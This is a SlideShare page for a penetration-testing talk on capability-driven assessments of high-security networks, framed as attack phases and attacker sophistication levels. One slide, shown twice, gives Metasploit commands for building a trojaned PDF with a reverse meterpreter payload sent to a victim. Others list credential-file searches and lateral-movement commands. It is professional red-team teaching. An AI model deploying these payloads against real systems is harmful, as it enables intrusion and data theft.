SlideShare a Scribd company logo
Big Bang Theory...
The Evolution of Pentesting High Security Environments
Presented By:
Joe McCray & Chris Gates
Whoami
• Joe McCray (j0emccray)
• Founder/CEO of Strategic Security
• 10+ Years Experience
– Network/Web/Mobile/Client-Server
– DoD, Federal Government, Commercial, Financial
– Specializing in High Security Environments &
Bypassing Security Solutions
– Spoken/Trained at over 200 security conferences
Whoami
• Chris Gates (CG)
– Twitter carnal0wnage
– Blog carnal0wnage.attackresearch.com
– Job Partner/Principal Security Consultant at Lares
– Affiliations  Co-Founder NoVAHackers, Attack Research, Metasploit
Project
• Previous Work
– Sr. Security Consultant – Rapid7
– Network Attack Team Lead – Applied Security Inc.
– Penetration Tester – BAH
– Computer Exploitation Technician – US Army Red Team
• Previous Talks
– Pentest Dirty Secrets -ColdFusion for Pentesters
– wXf Web eXploitation Framework -Information Gathering
– Attacking Oracle (via TNS/Web) -Client-Side Attacks
Vulnerability Driven Industry
• IT Security is focused on minimizing the presence of
vulnerabilities
J
Vulnerability Driven Industry
• Tons of Issues
– Doesn’t fix underlying problems
– Usually ignores the “low to pwned” aspect
– Focus on #’s of highs, meds, lows, and not if an
attacker can access important data and can the
organization detect it.
– Most Important:
– A vulnerability isn’t necessarily required
J
Data Driven Assessments
• Some more “forward leaning” companies perform “Data
Driven” assessments.
• Get company to identify what’s important…
• Go after it…Can I get to it?
• Vary rare to focus on detection and response along the way
C
Vulnerability Driven VS. Capability Driven
• IT Security Industry is currently focused on minimizing the
presence of vulnerabilities
• We’re recommending a change in focus to what attacker
tactics/techniques you can detect and respond to
• More importantly what level of sophistication of attacker
tactics/techniques you can detect and respond to
• We call this “Capability Driven Security Assessments”
J
Evaluating Capabilities
We’ve broken common attack tactics into 5 phases:
1. Targeting & Information Gathering
2. Initial Entry
3. Post-Exploitation
4. Lateral Movement
5. Data Exfiltration
J
The Process
Prepwork
Passive Intel
Gathering
Active Intel
Gathering
Targeting
Exploitation
C
How the Attack Works
From: Mandiant
C
Evaluating Capabilities
Within each phase we’ve got 4 levels of sophistication
Level 1: Script Kiddie
Level 2: Sys Admin
Level 3: Organized crime/hacker for hire
Level 4: State sponsored
1 2 3 4
J
Phase 1: Targeting
Determine who has what I want
Phase 1: Targeting
Determine who has access to it
C
Phase 1: Targeting
Determine who has access to it
C
Phase 2: Initial Entry
Which of these can you detect and respond to?
1. Client-Side Exploit (<1 yr old)
2. Client-Side Exploit (<90 days old)
3. Phishing for credentials
4. File Format Exploit (malicious attachment)
5. User Assist/”No Exploit” Exploit (ex: Java Applet)
6. Custom Exploit/0day
7. Phone calls
J
Phase 2: Initial Entry
Example Syntax:
Step 1: Create your own payload
wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe
./msfpayload windows/meterpreter/reverse_tcp R | msfencode -c 5 -e x86/shikata_ga_nai -x putty.exe -t exe >/tmp/payload.exe
Step 2: Create an evil pdf
./msfconsole
msf > use windows/fileformat/adobe_pdf_embedded_exe
msf > set PAYLOAD windows/meterpreter/reverse_https
msf > set EXENAME /tmp/payload.exe
msf > set FILENAME FluShotsSchedule.pdf
msf > set INFILENAME /tmp/Report.pdf
msf > set OUTPUTPATH /tmp/
msf > set LHOST [your attacker ip]
msf > exploit
Result: /tmp/FluShotsSchedule.pdf
Step 3: Send the evil pdf file to your client
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_https
msf > set ExitOnSession false
msf > set LHOST [your attacker ip]
msf > set LPORT 443
msf > exploit –j
Step 4: Send trojaned pdf file to victim and wait for the reverse connection from the client
J
Phase 2: Initial Entry
C
Phase 2: Initial Entry
Example Syntax:
Phishing Examples
C
Phase 2: Initial Entry
Post Exploitation Levels:
1. Access (this level is all that vulnerability assessment proves)
2. Leveraged Access (this level where an attacker can go after gaining access
to a system).
3. Keys to the Kingdom (Customer gives you a specific piece of data that you
are tasked with trying to gain access to)
4. Long Term Command and Control (The primary focus here is undetected
data exfiltration)
J
Phase 3: Post-Exploitation
Privilege escalation and data mining the compromised machine
1. Simple privilege escalation attempts (ex: at command, meterpreter
getsystem, uac bypass)
2. Simple data pilfering
– dir c:*password* /s
– dir c:*pass* /s
– dir c:*.pcf /s
3. Simple persistence (ex: registry modification, simple service
creation/replacement)
4. Advanced persistence (custom backdoor)
J
Phase 4: Lateral Movement
Moving from host to host within the target network
1. Simple file transfer via admin shares, and execution via net/at commands
2. NT Resource kit tools
3. 3rd Party System Admin tools
4. Custom tools (commands built into your backdoor)
C
Phase 4: Lateral Movement
Example Syntax:
1. net use some_workstion
2. cp mybin.exe some_workstationC$tempmybin.exe
Or
3. Psexec some_workstation
Or
4. Push out agent via various update tool (altiris, Microsoft SMS, etc)
C
Phase 5: Data Exfiltration
Getting business critical data out of the network
Exfiltrate [eks-fil-treyt]. verb,:
− To surreptitiously move personnel or materials out of an area under enemy
control.
In computing terms, exfiltration is the unauthorized removal of data from a
network.
1. Simple data exfil via any port/protocol
2. Simple data exfil via HTTP/DNS
3. Exfil via HTTPS
4. Authenticated proxy aware exfil
C
Phase 5: Data Exfiltration
Easier to move things in a small packages
• RAR, ZIP, and CAB files.
• Makecab built-in to Windows
• Most systems have 7zip, winRAR, etc
– All those allow for password protected files
– Most allow you to break big files into pieces of X size
Staging areas
• Locations to aggregate data before sending it out
• Easier to track tools and stolen data
• Fewer connections to external drops
• Typically workstations – plenty of storage space
• Is it abnormal for workstations to have high bandwidth usage?
C
Phase 5: Data Exfiltration
Fancy way
C
Phase 5: Data Exfiltration
If $company has put some effort into segmentation (rare)
C
Phase 5: Data Exfiltration
What normally happens…
C
Vulnerability Driven VS. Capability Driven
• Today’s Information Assurance Programs are comprised of
– Vulnerability Management (aka patch management)
– User Awareness
– Documentation of the first 2
• Vulnerabilities are transient
• Everyday you patch, everyday there’s more to patch
• If the attacker isn’t relying on the presence of vulnerabilities in
order to make his attack work you are in for a world of hurt!
J
Vulnerability Driven VS. Capability Driven
• Instead of saying “Mr. Customer, you have 600 highs, 1200
mediums, and 5000 lows”
• We saying “Mr. Customer, you able to detect and respond to a
level 3 attack (basically organized crime)”.
• Level 1: Script Kiddie
• Level 2: Sys Admin
• Level 3: Organized crime/hacker for hire
• Level 4: State sponsored
J
Giving Customers Man Hour Metrics
• Nothing will ever STOP an attacker – the goal is to make target
difficult to attack.
• How difficult is difficult?
• At what point would an attacker move on to another vector or
another company because this target is too difficult to break
into.
• At what point in the above can/will the organization detect the
activity and respond?
J
Strategic Security, Inc. © http://www.strategicsec.com/
• End-Point Protection Stopped The Exploit
• Popular Flash, Java exploits worked, but end-point protection stopped the exploit
Example Customer Slide 1
Strategic Security, Inc. © http://www.strategicsec.com/
• Security Mechanisms that had to be bypassed during this engagement
• XXXXXXXXX Endpoint Protection
• This required custom exe compilation, encoding, embedding in spreadsheet
• 8 man hours (Level 3 Rating)
• XXXXXXXXX Web Proxy
• Used SSL Encryption
• Less than 5 minutes (Level 2 Rating)
• XXXXXXXXX Managed Security Service
• Used SSL Encryption
• Less than 5 minutes (Level 2 Rating)
Example Customer Slide 2
J
Strategic Security, Inc. © http://www.strategicsec.com/
Most Likely Attack Vectors
Keys To
The
Kingdom
External
Websites Wireless
Network
Physical
Social
Engineering
Internal
Network
Red Teaming
• Once an organization can defend/detect
against a Level 2 attacker its time to consider
Red Teaming.
C
Red Teaming
• The term Red Team originated within the
military to describe a team whose purpose is to
penetrate security of "friendly" installations,
and thus test their security measures. This
method of testing allows for the highest level
of real world attacks to be simulated and used
to expose the potential weak points of an
organization’s total Information Security
program.
Why Red Teaming
• We typically test “stovepiped” environments.
• Q1 we do network pentesting
• Q2 we do phishing
• Q3 we do wifi
• Q4 we do physical
C
Red Teaming
• Typical Electronic Pentesting:
Electronic
• Network Pentesting
• Wifi
• Web Application
• Phishing
Red Teaming
• Social Engineering
Social
• In Person Social
Engineering
• Phone Conversation
• Social Profiling
Red Teaming
• Physical Attacks
Physical
• Facility access
• Lock picking, tailgating
• Defeating Physical Controls
• Badge recovery/cloning
Why Red Teaming
• The problem is that tests can be scoped to
“pass” each of these areas when they are
tested individually, with no analysis on how
compromise of one effects another.
Red Teaming
• What is convergence
“The merging of distinct technologies,
industries, or devices into a unified whole.”
http://www.merriam-webster.com/dictionary/convergence
“The combining of different forms of
electronic technology, such as data
processing and word processing converging
into information processing.”
http://www.thefreedictionary.com/convergence
Red Teaming Convergence
Red Teaming
• Electronic/Social to Physical Compromise
• Access to company via phishing attack
– Escalate to domain administrator
– Set up shop for persistent access
• Locate physical security users/computer
– Electronically compromise badge system (ex
Lenel/CCURE)
Red Teaming
• Electronic/Social to Physical Compromise
• Add a profile/change the picture of existing
profile.
Red Teaming
• Original “Eric Smith”
Red Teaming
• New “Eric Smith” 
Red Teaming
• Electronic/Social to Physical Compromise
• With picture/info changed.
• Go to facility, get a temporary badge
• Using access to badge system upgrade the
temporary badge
Red Teaming
• Now with all access 
Red Teaming
• Physical to Electronic Compromise
• In person Physical Attack
– Either by Social Engineering
– Fake Badges
– Tailgating
– Pure physical
Red Teaming
• Physical to Electronic Compromise
Red Teaming
• Physical to Electronic Compromise
Red Teaming
• Physical to Electronic Compromise
• Once inside compromise a computer or leave a
pwn-plug for persistent electronic access.
Red Teaming
• Physical to Electronic Compromise
Red Teaming
• Physical to Electronic Compromise
Questions?
Holla @ CG....
Email:
cgates [ ] laresconsulting [ ] com
Twitter:
http://twitter.com/carnal0wnage
Work
http://lares.com
Blog
http://carnal0wnage.attackresearch.com
Strategic Security, Inc. © http://www.strategicsec.com/
Holla @ j0e....
Toll Free: 1-866-892-2132
Email: joe@strategicsec.com
Twitter: http://twitter.com/j0emccray
Slideshare: http://www.slideshare.net/joemccray
LinkedIn: http://www.linkedin.com/in/joemccray

More Related Content

PDF
DevOops & How I hacked you DevopsDays DC June 2015
Chris Gates
 
PDF
Lares from LOW to PWNED
Chris Gates
 
PDF
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
PPTX
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
Chris Gates
 
PDF
Why isn't infosec working? Did you turn it off and back on again?
Rob Fuller
 
PDF
Introduction to red team operations
Sunny Neo
 
PPTX
AWS Survival Guide
Ken Johnson
 
PDF
Web security for developers
Sunny Neo
 
DevOops & How I hacked you DevopsDays DC June 2015
Chris Gates
 
Lares from LOW to PWNED
Chris Gates
 
hackcon2013-Dirty Little Secrets They Didn't Teach You In Pentesting Class v2
Chris Gates
 
DevOops Redux Ken Johnson Chris Gates - AppSec USA 2016
Chris Gates
 
Why isn't infosec working? Did you turn it off and back on again?
Rob Fuller
 
Introduction to red team operations
Sunny Neo
 
AWS Survival Guide
Ken Johnson
 
Web security for developers
Sunny Neo
 

What's hot (20)

PDF
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Chris Gates
 
PPTX
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
PPTX
Outlook and Exchange for the bad guys
Nick Landers
 
PPTX
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
PPTX
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
lokeshpidawekar
 
PPTX
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
CODE BLUE
 
PDF
1000 to 0
Sunny Neo
 
PPTX
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
PPTX
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 
PDF
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
CODE BLUE
 
PDF
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
PDF
Nessus and Reporting Karma
n|u - The Open Security Community
 
PPTX
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
Benjamin Delpy
 
PPTX
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
PPTX
Building an Empire with PowerShell
Will Schroeder
 
PDF
Open Canary - novahackers
Chris Gates
 
PPTX
Client side attacks using PowerShell
Nikhil Mittal
 
PDF
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
Diogo Mónica
 
PDF
Exploiting XPC in AntiVirus
Csaba Fitzl
 
PDF
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
The Dirty Little Secrets They Didn’t Teach You In Pentesting Class
Chris Gates
 
[CB16] Invoke-Obfuscation: PowerShell obFUsk8tion Techniques & How To (Try To...
CODE BLUE
 
Outlook and Exchange for the bad guys
Nick Landers
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Rob Fuller
 
Hacker's Practice Ground - Wall of Sheep workshops - Defcon 2015
lokeshpidawekar
 
[CB16] Facebook Malware: Tag Me If You Can by Ido Naor & Dani Goland
CODE BLUE
 
1000 to 0
Sunny Neo
 
Invoke-Obfuscation DerbyCon 2016
Daniel Bohannon
 
BSides London 2017 - Hunt Or Be Hunted
Alex Davies
 
An Abusive Relationship with AngularJS by Mario Heiderich - CODE BLUE 2015
CODE BLUE
 
Fantastic Red Team Attacks and How to Find Them
Ross Wolf
 
Nessus and Reporting Karma
n|u - The Open Security Community
 
BlueHat 2014 - The Attacker's View of Windows Authentication and Post Exploit...
Benjamin Delpy
 
How to discover 1352 Wordpress plugin 0days in one hour (not really)
Larry Cashdollar
 
Building an Empire with PowerShell
Will Schroeder
 
Open Canary - novahackers
Chris Gates
 
Client side attacks using PowerShell
Nikhil Mittal
 
From 0 to 0xdeadbeef - security mistakes that will haunt your startup
Diogo Mónica
 
Exploiting XPC in AntiVirus
Csaba Fitzl
 
The Unintended Risks of Trusting Active Directory
Will Schroeder
 
Ad

Viewers also liked (13)

PDF
Appsec DC - wXf -2010
Chris Gates
 
PDF
Top Security Challenges Facing Credit Unions Today
Chris Gates
 
PDF
Windows attacks - AT is the new black
Chris Gates
 
PPTX
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Chris Gates
 
PPTX
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Chris Gates
 
PDF
MSF Auxiliary Modules
Chris Gates
 
PDF
Going Purple : From full time breaker to part time fixer: 1 year later
Chris Gates
 
PDF
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Chris Gates
 
PPTX
Home Arcade setup (NoVA Hackers)
Chris Gates
 
PDF
ColdFusion for Penetration Testers
Chris Gates
 
PDF
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Chris Gates
 
PDF
LasCon 2014 DevOoops
Chris Gates
 
PPTX
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
Appsec DC - wXf -2010
Chris Gates
 
Top Security Challenges Facing Credit Unions Today
Chris Gates
 
Windows attacks - AT is the new black
Chris Gates
 
Devoops: DoJ Annual Cybersecurity Training Symposium Edition 2015
Chris Gates
 
Dirty Little Secrets They Didn't Teach You In Pentest Class v2
Chris Gates
 
MSF Auxiliary Modules
Chris Gates
 
Going Purple : From full time breaker to part time fixer: 1 year later
Chris Gates
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
Chris Gates
 
Home Arcade setup (NoVA Hackers)
Chris Gates
 
ColdFusion for Penetration Testers
Chris Gates
 
Purple Teaming the Cyber Kill Chain: Practical Exercises for Everyone Sector...
Chris Gates
 
LasCon 2014 DevOoops
Chris Gates
 
DevOOPS: Attacks and Defenses for DevOps Toolchains
Chris Gates
 
Ad

Similar to Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Defense 2013/Shmoocon Epilogue 2013 (20)

PDF
Big Bang Theory: The Evolution of Pentesting High Security Environments
Chris Gates
 
PPTX
Big Bang Theory: The Evolution of Pentesting High Security Environments
Joe McCray
 
PDF
Presentation defend your company against cyber threats with security solutions
xKinAnx
 
PDF
Security Solution - IBM Business Connect Qatar Defend your company against cy...
Dalia Reda
 
PDF
SplunkLive! Amsterdam 2015 - Analytics based security breakout
Splunk
 
PPTX
Operational Security Intelligence
Splunk
 
PPTX
InOffensive Security_cybersecurity2.pptx
wihib17507
 
PDF
Building Security Controls around Attack Models
SeniorStoryteller
 
PPTX
Big data security
CloudBees
 
PDF
Advanced Threats and Lateral Movement Detection
Greg Foss
 
PPTX
Splunk for Security-Hands On
Splunk
 
PPT
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
SurfWatch Labs
 
PPTX
Splunk for Security Breakout Session
Splunk
 
PDF
SplunkLive! Stockholm 2015 breakout - Analytics based security
Splunk
 
PPTX
Vulnerability Management
justinkallhoff
 
PPTX
Increasing Value Of Security Assessment Services
Chris Nickerson
 
PDF
Evidence-Based Security: The New Top Five Controls
Priyanka Aash
 
PDF
Cyber Defense - How to be prepared to APT
Simone Onofri
 
PDF
Adversary Playbook Tactical Assessment of Protection Techniques
Justin Berman
 
PDF
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Gabriel Dusil
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Chris Gates
 
Big Bang Theory: The Evolution of Pentesting High Security Environments
Joe McCray
 
Presentation defend your company against cyber threats with security solutions
xKinAnx
 
Security Solution - IBM Business Connect Qatar Defend your company against cy...
Dalia Reda
 
SplunkLive! Amsterdam 2015 - Analytics based security breakout
Splunk
 
Operational Security Intelligence
Splunk
 
InOffensive Security_cybersecurity2.pptx
wihib17507
 
Building Security Controls around Attack Models
SeniorStoryteller
 
Big data security
CloudBees
 
Advanced Threats and Lateral Movement Detection
Greg Foss
 
Splunk for Security-Hands On
Splunk
 
How to Access and Make Use of “Trapped” Cyber Data to Reduce Your Risk
SurfWatch Labs
 
Splunk for Security Breakout Session
Splunk
 
SplunkLive! Stockholm 2015 breakout - Analytics based security
Splunk
 
Vulnerability Management
justinkallhoff
 
Increasing Value Of Security Assessment Services
Chris Nickerson
 
Evidence-Based Security: The New Top Five Controls
Priyanka Aash
 
Cyber Defense - How to be prepared to APT
Simone Onofri
 
Adversary Playbook Tactical Assessment of Protection Techniques
Justin Berman
 
Cognitive Security - Anatomy of Advanced Persistent Threats ('12)
Gabriel Dusil
 

More from Chris Gates (10)

PDF
Reiki 101 - Defcon29 MHHV
Chris Gates
 
PDF
WeirdAAL (Awesome Attack Library) CactusCon 2018
Chris Gates
 
PPTX
WeirdAAL (AWS Attack Library)
Chris Gates
 
PDF
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
PDF
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Chris Gates
 
PDF
Open Source Information Gathering Brucon Edition
Chris Gates
 
PDF
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
Chris Gates
 
PDF
Hacking Oracle Web Applications With Metasploit
Chris Gates
 
PDF
Attacking Oracle with the Metasploit Framework
Chris Gates
 
PDF
Client-Side Penetration Testing Presentation
Chris Gates
 
Reiki 101 - Defcon29 MHHV
Chris Gates
 
WeirdAAL (Awesome Attack Library) CactusCon 2018
Chris Gates
 
WeirdAAL (AWS Attack Library)
Chris Gates
 
PENETRATION TESTING FROM A HOT TUB TIME MACHINE
Chris Gates
 
Adversarial Simulation Nickerson/Gates Wild West Hacking Fest Oct 2017
Chris Gates
 
Open Source Information Gathering Brucon Edition
Chris Gates
 
SOURCE Boston --Attacking Oracle Web Applications with Metasploit & wXf
Chris Gates
 
Hacking Oracle Web Applications With Metasploit
Chris Gates
 
Attacking Oracle with the Metasploit Framework
Chris Gates
 
Client-Side Penetration Testing Presentation
Chris Gates
 

Recently uploaded (20)

PDF
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
PDF
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
PPTX
ChatGPT's Deck on The Enduring Legacy of Fax Machines
Greg Swan
 
PDF
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
PDF
Software Development Methodologies in 2025
KodekX
 
PDF
MASTERDECK GRAPHSUMMIT SYDNEY (Public).pdf
Neo4j
 
PDF
SparkLabs Primer on Artificial Intelligence 2025
SparkLabs Group
 
PDF
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
PDF
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
PPTX
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
PDF
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
PDF
A Day in the Life of Location Data - Turning Where into How.pdf
Precisely
 
PPTX
The-Ethical-Hackers-Imperative-Safeguarding-the-Digital-Frontier.pptx
sujalchauhan1305
 
PDF
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
PDF
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
PDF
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
PDF
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
PDF
Trying to figure out MCP by actually building an app from scratch with open s...
Julien SIMON
 
PDF
Beyond Automation: The Role of IoT Sensor Integration in Next-Gen Industries
Rejig Digital
 
PDF
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 
Automating ArcGIS Content Discovery with FME: A Real World Use Case
Safe Software
 
How Open Source Changed My Career by abdelrahman ismail
a0m0rajab1
 
ChatGPT's Deck on The Enduring Legacy of Fax Machines
Greg Swan
 
Cloud-Migration-Best-Practices-A-Practical-Guide-to-AWS-Azure-and-Google-Clou...
Artjoker Software Development Company
 
Software Development Methodologies in 2025
KodekX
 
MASTERDECK GRAPHSUMMIT SYDNEY (Public).pdf
Neo4j
 
SparkLabs Primer on Artificial Intelligence 2025
SparkLabs Group
 
NewMind AI Weekly Chronicles - July'25 - Week IV
NewMind AI
 
A Strategic Analysis of the MVNO Wave in Emerging Markets.pdf
IPLOOK Networks
 
AI and Robotics for Human Well-being.pptx
JAYMIN SUTHAR
 
CIFDAQ's Market Wrap : Bears Back in Control?
CIFDAQ
 
A Day in the Life of Location Data - Turning Where into How.pdf
Precisely
 
The-Ethical-Hackers-Imperative-Safeguarding-the-Digital-Frontier.pptx
sujalchauhan1305
 
Unlocking the Future- AI Agents Meet Oracle Database 23ai - AIOUG Yatra 2025.pdf
Sandesh Rao
 
Data_Analytics_vs_Data_Science_vs_BI_by_CA_Suvidha_Chaplot.pdf
CA Suvidha Chaplot
 
AI Unleashed - Shaping the Future -Starting Today - AIOUG Yatra 2025 - For Co...
Sandesh Rao
 
Research-Fundamentals-and-Topic-Development.pdf
ayesha butalia
 
Trying to figure out MCP by actually building an app from scratch with open s...
Julien SIMON
 
Beyond Automation: The Role of IoT Sensor Integration in Next-Gen Industries
Rejig Digital
 
Structs to JSON: How Go Powers REST APIs
Emily Achieng
 

Big Bang Theory: The Evolution of Pentesting High Security Enviroments IT Defense 2013/Shmoocon Epilogue 2013

  • 1. Big Bang Theory... The Evolution of Pentesting High Security Environments Presented By: Joe McCray & Chris Gates
  • 2. Whoami • Joe McCray (j0emccray) • Founder/CEO of Strategic Security • 10+ Years Experience – Network/Web/Mobile/Client-Server – DoD, Federal Government, Commercial, Financial – Specializing in High Security Environments & Bypassing Security Solutions – Spoken/Trained at over 200 security conferences
  • 3. Whoami • Chris Gates (CG) – Twitter carnal0wnage – Blog carnal0wnage.attackresearch.com – Job Partner/Principal Security Consultant at Lares – Affiliations  Co-Founder NoVAHackers, Attack Research, Metasploit Project • Previous Work – Sr. Security Consultant – Rapid7 – Network Attack Team Lead – Applied Security Inc. – Penetration Tester – BAH – Computer Exploitation Technician – US Army Red Team • Previous Talks – Pentest Dirty Secrets -ColdFusion for Pentesters – wXf Web eXploitation Framework -Information Gathering – Attacking Oracle (via TNS/Web) -Client-Side Attacks
  • 4. Vulnerability Driven Industry • IT Security is focused on minimizing the presence of vulnerabilities J
  • 5. Vulnerability Driven Industry • Tons of Issues – Doesn’t fix underlying problems – Usually ignores the “low to pwned” aspect – Focus on #’s of highs, meds, lows, and not if an attacker can access important data and can the organization detect it. – Most Important: – A vulnerability isn’t necessarily required J
  • 6. Data Driven Assessments • Some more “forward leaning” companies perform “Data Driven” assessments. • Get company to identify what’s important… • Go after it…Can I get to it? • Vary rare to focus on detection and response along the way C
  • 7. Vulnerability Driven VS. Capability Driven • IT Security Industry is currently focused on minimizing the presence of vulnerabilities • We’re recommending a change in focus to what attacker tactics/techniques you can detect and respond to • More importantly what level of sophistication of attacker tactics/techniques you can detect and respond to • We call this “Capability Driven Security Assessments” J
  • 8. Evaluating Capabilities We’ve broken common attack tactics into 5 phases: 1. Targeting & Information Gathering 2. Initial Entry 3. Post-Exploitation 4. Lateral Movement 5. Data Exfiltration J
  • 9. The Process Prepwork Passive Intel Gathering Active Intel Gathering Targeting Exploitation C
  • 10. How the Attack Works From: Mandiant C
  • 11. Evaluating Capabilities Within each phase we’ve got 4 levels of sophistication Level 1: Script Kiddie Level 2: Sys Admin Level 3: Organized crime/hacker for hire Level 4: State sponsored 1 2 3 4 J
  • 12. Phase 1: Targeting Determine who has what I want
  • 13. Phase 1: Targeting Determine who has access to it C
  • 14. Phase 1: Targeting Determine who has access to it C
  • 15. Phase 2: Initial Entry Which of these can you detect and respond to? 1. Client-Side Exploit (<1 yr old) 2. Client-Side Exploit (<90 days old) 3. Phishing for credentials 4. File Format Exploit (malicious attachment) 5. User Assist/”No Exploit” Exploit (ex: Java Applet) 6. Custom Exploit/0day 7. Phone calls J
  • 16. Phase 2: Initial Entry Example Syntax: Step 1: Create your own payload wget http://the.earth.li/~sgtatham/putty/latest/x86/putty.exe ./msfpayload windows/meterpreter/reverse_tcp R | msfencode -c 5 -e x86/shikata_ga_nai -x putty.exe -t exe >/tmp/payload.exe Step 2: Create an evil pdf ./msfconsole msf > use windows/fileformat/adobe_pdf_embedded_exe msf > set PAYLOAD windows/meterpreter/reverse_https msf > set EXENAME /tmp/payload.exe msf > set FILENAME FluShotsSchedule.pdf msf > set INFILENAME /tmp/Report.pdf msf > set OUTPUTPATH /tmp/ msf > set LHOST [your attacker ip] msf > exploit Result: /tmp/FluShotsSchedule.pdf Step 3: Send the evil pdf file to your client msf > use exploit/multi/handler msf > set PAYLOAD windows/meterpreter/reverse_https msf > set ExitOnSession false msf > set LHOST [your attacker ip] msf > set LPORT 443 msf > exploit –j Step 4: Send trojaned pdf file to victim and wait for the reverse connection from the client J
  • 17. Phase 2: Initial Entry C
  • 18. Phase 2: Initial Entry Example Syntax: Phishing Examples C
  • 20. Post Exploitation Levels: 1. Access (this level is all that vulnerability assessment proves) 2. Leveraged Access (this level where an attacker can go after gaining access to a system). 3. Keys to the Kingdom (Customer gives you a specific piece of data that you are tasked with trying to gain access to) 4. Long Term Command and Control (The primary focus here is undetected data exfiltration) J
  • 21. Phase 3: Post-Exploitation Privilege escalation and data mining the compromised machine 1. Simple privilege escalation attempts (ex: at command, meterpreter getsystem, uac bypass) 2. Simple data pilfering – dir c:*password* /s – dir c:*pass* /s – dir c:*.pcf /s 3. Simple persistence (ex: registry modification, simple service creation/replacement) 4. Advanced persistence (custom backdoor) J
  • 22. Phase 4: Lateral Movement Moving from host to host within the target network 1. Simple file transfer via admin shares, and execution via net/at commands 2. NT Resource kit tools 3. 3rd Party System Admin tools 4. Custom tools (commands built into your backdoor) C
  • 23. Phase 4: Lateral Movement Example Syntax: 1. net use some_workstion 2. cp mybin.exe some_workstationC$tempmybin.exe Or 3. Psexec some_workstation Or 4. Push out agent via various update tool (altiris, Microsoft SMS, etc) C
  • 24. Phase 5: Data Exfiltration Getting business critical data out of the network Exfiltrate [eks-fil-treyt]. verb,: − To surreptitiously move personnel or materials out of an area under enemy control. In computing terms, exfiltration is the unauthorized removal of data from a network. 1. Simple data exfil via any port/protocol 2. Simple data exfil via HTTP/DNS 3. Exfil via HTTPS 4. Authenticated proxy aware exfil C
  • 25. Phase 5: Data Exfiltration Easier to move things in a small packages • RAR, ZIP, and CAB files. • Makecab built-in to Windows • Most systems have 7zip, winRAR, etc – All those allow for password protected files – Most allow you to break big files into pieces of X size Staging areas • Locations to aggregate data before sending it out • Easier to track tools and stolen data • Fewer connections to external drops • Typically workstations – plenty of storage space • Is it abnormal for workstations to have high bandwidth usage? C
  • 26. Phase 5: Data Exfiltration Fancy way C
  • 27. Phase 5: Data Exfiltration If $company has put some effort into segmentation (rare) C
  • 28. Phase 5: Data Exfiltration What normally happens… C
  • 29. Vulnerability Driven VS. Capability Driven • Today’s Information Assurance Programs are comprised of – Vulnerability Management (aka patch management) – User Awareness – Documentation of the first 2 • Vulnerabilities are transient • Everyday you patch, everyday there’s more to patch • If the attacker isn’t relying on the presence of vulnerabilities in order to make his attack work you are in for a world of hurt! J
  • 30. Vulnerability Driven VS. Capability Driven • Instead of saying “Mr. Customer, you have 600 highs, 1200 mediums, and 5000 lows” • We saying “Mr. Customer, you able to detect and respond to a level 3 attack (basically organized crime)”. • Level 1: Script Kiddie • Level 2: Sys Admin • Level 3: Organized crime/hacker for hire • Level 4: State sponsored J
